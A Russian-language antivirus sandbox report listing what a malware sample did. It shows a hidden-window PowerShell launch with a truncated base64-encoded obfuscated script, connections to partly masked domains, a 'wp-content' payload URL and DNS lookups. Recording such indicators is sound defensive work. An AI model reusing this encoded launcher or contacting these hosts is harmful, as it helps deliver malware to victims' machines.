Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAGkAdwB4AHoAZwByAHIAZQBrAD0AJwBLAG0AYQBrAGgAdAB6AHQAcwBzAHoAJwA7ACQARgB4AGoAZgBoAHYAcQB6AG4AIAA9AC...
- 'bp###t.co.il':443
- 'po######dcourieretc.co.uk':443
- 'ka###ed.com.tr':80
- http://www.ka###ed.com.tr/en/wp-content/WYdgTaSsr/
- 'bp###t.co.il':443
- 'po######dcourieretc.co.uk':443
- DNS ASK in####acefive.com
- DNS ASK pa###ciayork.gq
- DNS ASK bp###t.co.il
- DNS ASK po######dcourieretc.co.uk
- DNS ASK ka###ed.com.tr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAGkAdwB4AHoAZwByAHIAZQBrAD0AJwBLAG0AYQBrAGgAdAB6AHQAcwBzAHoAJwA7ACQARgB4AGoAZgBoAHYAcQB6AG4AIAA9AC...' (со скрытым окном)